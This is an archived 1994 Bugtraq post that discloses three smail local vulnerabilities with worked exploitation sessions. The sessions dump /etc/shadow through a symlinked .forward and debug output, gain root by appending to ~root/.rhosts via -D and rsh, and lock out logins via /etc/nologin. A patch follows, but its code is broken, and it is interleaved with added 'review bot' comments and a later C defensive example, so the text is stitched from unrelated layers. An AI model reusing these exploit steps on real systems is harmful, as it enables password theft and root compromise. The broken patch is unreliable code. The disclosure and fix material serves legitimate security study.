Bugtraq mailing list archives

Re: 3 SMAIL BUGS


From: xcelsior () altair csustan edu (Excelsior)
Date: Sun, 9 Oct 94 00:09:02 PDT


aleph1 () dfw net (Aleph One) spewed....
Ok for all of you asking which are the 3
here is the count down:

Number 3 - The SMTP DEBUG problem. Anyone can
       telnet to your SMTP port and read any
       file on the system.

You are exaggerating the problem.  To exploit this, you have to have 
an account on the local machine (in order to create the ~/.forward 
link).  Not just "anyone" can exploit it.

Fixed by adding
       -smtp_debug in your smail config file.

Wrong wrong wrong!  All the -smtp_debug flag does is keep you from
exploiting it by telnetting directly to the smtp port.  There is
an easier way to exploit it.

Number 2 - The .forward problem. Another
       configuration problem. Smail does not
       check file attributes when delivering mail
               ^^^^^^^^^^^^^^^
Wrong again.  It does check the file attributes, but not the attributes
of the DIRECTORY you are trying to create the file in - thus causing
the problem.

       to a file pointed to by a .forward. Fixed
       by adding the check_path attribute to the
       forward file director.

and

Number 1 - Debug file bug. Smail creates or appends to
       any file using the debug options!

How about explaining those bugs in detail?  If I wanted to hear
"There is a bug" with no explanation, I'd read CERT.  Maybe
you don't know how the bugs work, but if you do, don't be a WUSS
- post it!

There. What I said will fix #1 and #2.

Nope, what you said will definitely NOT fix #1 or #3.  You can fix
#2 as you described, but you weren't very specific about it, were you?

Several different
patches have been posted for #3 on usenet. Check
comp.mail.smail and the comp.is.linux.* newsgroups.
Also the maintainers of smail will fix it RSN.
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Isn't that a little harsh?  How about just giving them a course in
writing secure Setuid programs.  :)


Ok, now everyone repeat after me:
BUGTRAQ IS A FULL DISCLOSURE LIST

That's right.  FULL disclosure.  Since all the elite cracker pussies
are too scared to describe their bugs in detail, I will.  I am
including a security doc on smail that I wrote a little while ago.
I'm sure most of the cracker dudes got it from my DocServer and FTP
site, so here it comes to the rest of you.  I hope this encourages
more people to stop being childish and post your bugs.  I'll be
posting more goodies from my archives soon as well.

Share and enjoy.... :)


-------------------------------------------------
EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994

***
Bug #1
***

SYNOPSIS
--------

Use of ~/.forward and debug lets a local user read any file on the system.


EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> ln -s /etc/shadow .forward
loser@possesux ~> ls -la .forward
lrwxrwxrwx   1 loser    users          11 Sep  5 12:08 .forward -> /etc/shadow

loser@possesux ~> telnet localhost smtp

Trying 127.0.0.1...
Connected to localhost-gw.
Escape character is '^]'.
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10 PDT
debug 20
250 Debugging level: 20
expn loser

[lots of crap]

expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile:  opening forward file /home/loser/.forward

[more crap]

read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[....]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
Connection closed by foreign host.
---------------

Contrary to popular belief, adding -smtp_debug to your smail config file
will NOT prevent this bug from occurring.  It will just prevent exploitation
via the smtp port.

We can just do this....

----------
loser@possesux ~> smail -bs -v20
expand_string($primary_name Smail$version ready for fakemail on $date,(null),(null)) called
expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15 PDT
expn loser

[same crap as before]

expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile:  opening forward file /home/loser/.forward

[more of same crap]

read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[.....]


process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection

----------

The easy way to fix this is to nuke the -d and -v options from smail.



***
Bug #2
***

SYNOPSIS
--------

Smail called with the -D flag will allow you to create and append to any
file on the system.


EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> cat > ~/.forward

localhost loser
^D
loser@possesux ~> smail -bs -D ~root/.rhosts -v20
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23 PDT
expn loser
250 loser
quit
221 possesux.warez.mil closing connection

loser@possesux ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)

--------------

Neat, huh?  Patch by nuking the -D option from smail.

I received the following patch recently.  I haven't tested it, so use
at your own risk.

*** Omain.c     Wed Mar 11 12:33:18 1993
--- main.c      Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
      }

-     /*
-      * change error file to debugging file from -D option, if any
-      */
-
-     if (arg_debug_file) {
-       new_errfile = fopen(arg_debug_file, "a");
-       if (new_errfile == NULL) {
-           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
-                     arg_debug_file, strerrno(errno));
-           arg_debug_file = NULL;
-       } else {
-           errfile = new_errfile;
-           fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
-                   program, (long)getpid());
-       }
-     }
-
-     /*
       * read in the transport, router and director files, if needed
       *
       * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
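Review bot: with the block deleted from here, any debugging output produced while the transport, router and director files are read (the step the surviving comment at the foot of this hunk describes) now goes to the previous errfile rather than to the -D file, because the switch-over only happens after the setuid/setgid calls. That is the price of opening the file with the user's credentials and is fine, but it belongs next to the "Side effect" remark so that a debug log that starts late is not mistaken for a bug.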
***************
*** 525,530 ****
--- 508,537 ----
      if (prog_euid != REQUIRED_EUID)
            queue_only = TRUE;
  #endif
+
+     /*
+      * change error file to debugging file from -D option, if any
+      *
+      * JMJ: Change location of this fragment to below the setuid/setgid
+      *      calls to allow for use of fopen_as_user() instead of just
+      *      fopen().
+      *
+      *      Side effect: -D now requires full pathname to debug file
+      */
+
+     if (arg_debug_file) {
+       new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+           prog_egid, 0600);
+           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+                     arg_debug_file, strerrno(errno));
+           arg_debug_file = NULL;
+       } else {
+           errfile = new_errfile;
+           fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+                   program, (long)getpid());
+       }
+     }

      /*
       * error processing can be other than TERMINAL only for
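Review bot: the error branch has lost its condition: between the fopen_as_user() call and the write_log() warning there must be an `if (new_errfile == NULL) {` (the line the removed block had), otherwise the `} else {` that follows has no matching if and the hunk does not compile; read as typed, the warning and `arg_debug_file = NULL` would also run unconditionally and the final `}` is unbalanced. While restoring that line, consider rejecting a relative `arg_debug_file` explicitly (warn and clear it when `arg_debug_file[0] != '/'`) instead of leaving "requires full pathname" as a side effect noted only in the comment, since after the privilege changes a relative name is resolved against whatever the current directory happens to be.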
--




***
Bug #3
***

SYNOPSIS
--------

Files specified in ~/.forward can be created in any directory, regardless
of its permissions.  (File is still owned by mailbox owner, however.)


EXAMPLE OF EXPLOITATION
-----------------------

loser@possesux ~> echo "/etc/nologin" > ~/.forward
loser@possesux ~> mail -r root loser < /dev/null
loser@possesux ~> echo "Site shutdown due to smail lameness" >!  /etc/nologin
loser@possesux ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

---------


Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:

---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,                   # file is taken from address
        append_as_user,                 # use user-id associated with address
        expand_user,                    # expand ~ and $ within address
        check_path,   #<--add this line
        suffix = "\n",
        mode = 0644
[...]
---

That's it for now.  If you appreciated reading this file, then consider
posting your exploitation scripts too.

Share and enjoy!

- Excelsior
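The checks the three bugs above call for, written out in C. This is an added example, not smail's code and not Excelsior's or the patch author's: delivery_path_ok() is a check_path-style test (the directory the file lands in must be writable by the delivering user according to its mode bits, and an existing target must be a regular file that user owns, which also refuses a symlinked .forward), and open_append_as_user() opens the -D debug file the way the relocated fopen_as_user() call intends, with the effective uid/gid dropped to the real user around the open and O_NOFOLLOW set. The function names, run_scenarios() and the throw-away fixture it builds under $TMPDIR are my own assumptions; the "other user" (uid+1, gid+1) is constructed, not looked up.

```c
#define _GNU_SOURCE            /* O_NOFOLLOW, mkdtemp, seteuid on glibc */
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Is the object in st writable by uid/gid?  Decided from ownership and
 * mode bits alone, never from the caller's own (root) privileges. */
static int writable_by(const struct stat *st, uid_t uid, gid_t gid)
{
    if (st->st_uid == uid) return (st->st_mode & S_IWUSR) != 0;
    if (st->st_gid == gid) return (st->st_mode & S_IWGRP) != 0;
    return (st->st_mode & S_IWOTH) != 0;
}

/* check_path in spirit (bug #3): may mail for uid/gid be appended to path?
 * The containing directory must be writable by that user and an existing
 * target must be a regular file it owns, so a symlinked .forward or mailbox
 * (bug #1) is refused as well.  Returns 1 to allow delivery, 0 to refuse. */
int delivery_path_ok(const char *path, uid_t uid, gid_t gid)
{
    char dir[PATH_MAX];
    const char *slash = strrchr(path, '/');
    struct stat st;
    size_t n;

    if (path[0] != '/') return 0;                  /* absolute paths only */
    n = (slash == path) ? 1 : (size_t)(slash - path);
    if (n >= sizeof dir) return 0;
    memcpy(dir, path, n);
    dir[n] = '\0';
    if (lstat(dir, &st) < 0 || !S_ISDIR(st.st_mode)) return 0;
    if (!writable_by(&st, uid, gid)) return 0;
    if (lstat(path, &st) < 0) return errno == ENOENT;  /* will be created */
    return S_ISREG(st.st_mode) && st.st_uid == uid;
}

/* The -D fix (bug #2) spelled out: open the debug file for append while
 * temporarily running as the real user, so the kernel decides whether that
 * user may create or append to it.  Symlinks are refused via O_NOFOLLOW.
 * Returns a file descriptor, or -1 with errno set. */
int open_append_as_user(const char *path, uid_t uid, gid_t gid, mode_t mode)
{
    uid_t saved_uid = geteuid();
    gid_t saved_gid = getegid();
    int fd, saved_errno;
    if (path[0] != '/') { errno = EINVAL; return -1; } /* cwd is not ours */
    if (setegid(gid) < 0) return -1;         /* gid first: needs root euid */
    if (seteuid(uid) < 0) { setegid(saved_gid); return -1; }
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, mode);
    saved_errno = errno;
    if (seteuid(saved_uid) < 0 || setegid(saved_gid) < 0)
        abort();                      /* cannot regain privilege: stop */
    errno = saved_errno;
    return fd;
}

/* Constructed fixture under $TMPDIR (or /tmp) exercising both checks the
 * way the three bugs would; returns how many of the six checks behaved. */
int run_scenarios(void)
{
    const char *tmp = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    char dir[PATH_MAX], mbox[PATH_MAX], fwd[PATH_MAX];
    uid_t me = geteuid(), other = me + 1;      /* "other": not this user */
    gid_t mygrp = getegid(), othergrp = mygrp + 1;
    int ok = 0, fd;
    snprintf(dir, sizeof dir, "%s/smailchkXXXXXX", tmp);
    if (mkdtemp(dir) == NULL) return 0;        /* mode 0700, owned by us */
    snprintf(mbox, sizeof mbox, "%s/mbox", dir);
    snprintf(fwd, sizeof fwd, "%s/forward", dir);
    ok += delivery_path_ok(mbox, me, mygrp) == 1;          /* own directory */
    ok += delivery_path_ok(mbox, other, othergrp) == 0;    /* someone else's */
    ok += delivery_path_ok("/etc/nologin", other, othergrp) == 0;  /* bug #3 */
    fd = open_append_as_user(mbox, me, mygrp, 0600);
    ok += fd >= 0 && write(fd, "test\n", 5) == 5;
    if (fd >= 0) close(fd);
    if (symlink(mbox, fwd) == 0) {          /* like .forward -> /etc/shadow */
        ok += delivery_path_ok(fwd, me, mygrp) == 0;                /* bug #1 */
        ok += open_append_as_user(fwd, me, mygrp, 0600) == -1 && errno == ELOOP;
        unlink(fwd);
    }
    unlink(mbox);
    rmdir(dir);
    return ok;
}

int main(void)
{
    int passed = run_scenarios();
    printf("%d of 6 checks behaved as intended\n", passed);
    return passed == 6 ? 0 : 1;
}
```

Compile with cc and run; it reports how many of the six checks behaved as intended. Note that a mode-bit check like delivery_path_ok() is only a screen: the directory can change between the check and the open, so the open itself should still be done with the user's credentials, which is what open_append_as_user() does and what the relocated fopen_as_user() in the patch is after.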


